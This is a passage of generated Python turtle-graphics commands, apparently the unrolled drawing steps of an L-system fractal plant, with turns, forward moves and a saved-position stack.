right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((6.12,14.78)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,29.56)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,29.56)), setheading(67.5) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((27.03,35.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((27.03,35.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((27.03,35.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((27.03,35.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((38.34,47.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((38.34,47.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((38.34,47.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((38.34,47.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((44.46,61.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((44.46,61.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 45.0), ((44.46,61.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((44.46,61.78)), setheading(67.5) ;
pu(), setposition((12.25,29.56)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((12.25,45.56), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,45.56)), setheading(67.5) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((12.25,45.56), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((12.25,45.56)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((18.37,60.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,60.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((18.37,60.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,60.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((29.68,71.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((29.68,71.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((12.25,29.56), 67.5), ((29.68,71.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((29.68,71.66)), setheading(45.0) ;
pu(), setposition((12.25,29.56)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((18.37,44.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,44.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((18.37,44.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((18.37,44.35)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,59.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,59.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((50.59,76.56), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((50.59,76.56)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((50.59,76.56), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((50.59,76.56)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((56.71,91.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((56.71,91.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((56.71,91.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((56.71,91.35)), setheading(67.5) ;
pu(), setposition((24.49,59.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,89.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,89.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((30.61,89.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,89.91)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((41.93,101.22), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,101.22)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((41.93,101.22), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((41.93,101.22)), setheading(45.0) ;
pu(), setposition((24.49,59.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((39.27,65.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((39.27,65.25)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.06,71.37)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.06,71.37)), setheading(22.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((68.84,65.25), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.84,65.25)), setheading(315.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((68.84,65.25), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((68.84,65.25)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((84.84,65.25), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.84,65.25)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((84.84,65.25), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((84.84,65.25)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((99.62,71.37), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.62,71.37)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 0.0), ((99.62,71.37), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.62,71.37)), setheading(22.5) ;
pu(), setposition((54.06,71.37)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((65.37,82.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((65.37,82.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((80.15,88.81), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((80.15,88.81)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((80.15,88.81), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((80.15,88.81)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((96.15,88.81), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.15,88.81)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((54.06,71.37), 22.5), ((96.15,88.81), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((96.15,88.81)), setheading(0.0) ;
pu(), setposition((54.06,71.37)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((65.37,82.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((65.37,82.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((65.37,82.69)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.68,94.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.68,94.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((92.68,94.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((92.68,94.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((92.68,94.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((92.68,94.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((107.47,100.12), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.47,100.12)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((107.47,100.12), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((107.47,100.12)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((118.78,111.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.78,111.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 22.5), ((118.78,111.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((118.78,111.44)), setheading(45.0) ;
pu(), setposition((76.68,94.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((82.81,108.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((82.81,108.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((94.12,120.10), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((94.12,120.10)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((94.12,120.10), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((94.12,120.10)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((108.90,126.22), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.90,126.22)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((76.68,94.00), 45.0), ((108.90,126.22), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.90,126.22)), setheading(22.5) ;
pu(), setposition((76.68,94.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((82.81,108.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((82.81,108.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((82.81,108.78)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,123.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,123.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((103.71,129.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.71,129.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((103.71,129.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.71,129.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((115.02,141.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((115.02,141.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((115.02,141.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((115.02,141.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((121.15,155.78), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((121.15,155.78)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 45.0), ((121.15,155.78), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((121.15,155.78)), setheading(67.5) ;
pu(), setposition((88.93,123.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((88.93,139.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,139.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((88.93,139.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.93,139.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((95.05,154.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.05,154.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((95.05,154.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.05,154.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((106.37,165.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((106.37,165.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 45.0), ((88.93,123.57), 67.5), ((106.37,165.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((106.37,165.66)), setheading(45.0) ;
pu(), setposition((88.93,123.57)), setheading(67.5) ;
pu(), setposition((24.49,59.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,75.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,75.13)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,91.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((24.49,91.13)), setheading(90.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((35.81,102.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((35.81,102.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((24.49,59.13), 67.5), ((24.49,91.13), 67.5), ((35.81,102.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
